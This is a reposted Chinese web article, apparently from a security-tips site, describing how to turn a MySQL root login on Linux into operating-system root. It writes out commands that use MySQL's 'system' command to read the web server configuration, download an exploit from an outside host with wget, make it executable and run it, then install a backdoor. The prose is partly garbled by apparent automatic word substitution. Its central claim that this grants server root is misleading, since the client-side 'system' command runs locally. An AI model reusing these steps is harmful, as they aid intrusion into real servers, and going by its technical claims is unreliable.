<b>Linux下MySQL root又一提权办法</b>[Linux安全]
本文“<b>Linux下MySQL root又一提权办法</b>[Linux安全]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
mysql5.x for linux下面有一个函数,可以帮忙我们干很多事情,这个函数4.x下面目似没,本来一向没发现,也没去查函数手册,就我自己的经验来写点东西.4,x的 明天再看看函数手册,再装一个实行一下.
mysql 5.x里面引入了一个system函数,这个函数可以履行系统号令,当mysql以root登陆的时刻,便可以操纵这个函数履行号令,当然是在权限答应的 范围内.
普通我们按照通例思绪,搞到mysql的root密码之后,我们城市衔接上去,成立一个表,然后outfile,搞到一个webshell ,然后提权如此这般.本日我们换一种方法.
按照上面的办法,我们需求知道web的绝对途径,当然这个很不好找,有些有sqlinjection的,大概报错会显示出来,有的就不一定了.但是 按照我的的办法,没有必要再去找web途径了,直接履行
mysql>system vi /etc/httpd/conf/httpd.conf;
直接这样便可以找到web的途径,当然,我们的目的并非找web途径,放webshell进去.我们是要来做其他的事情,比方,下载exp履行, 搞到 root权限,然后装后门虾米的
mysql>system wget http://www.百度.org.tw/xxxx ;
mysql>system chmod +x xxxx;
mysql>system ./xxxx;
这样mysql的root此时就成为system的root了,剩下的事情,假如开了ssh,就ssh上去,输入mysql的用户密码,ok,搞定.
以上是“<b>Linux下MySQL root又一提权办法</b>[Linux安全]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |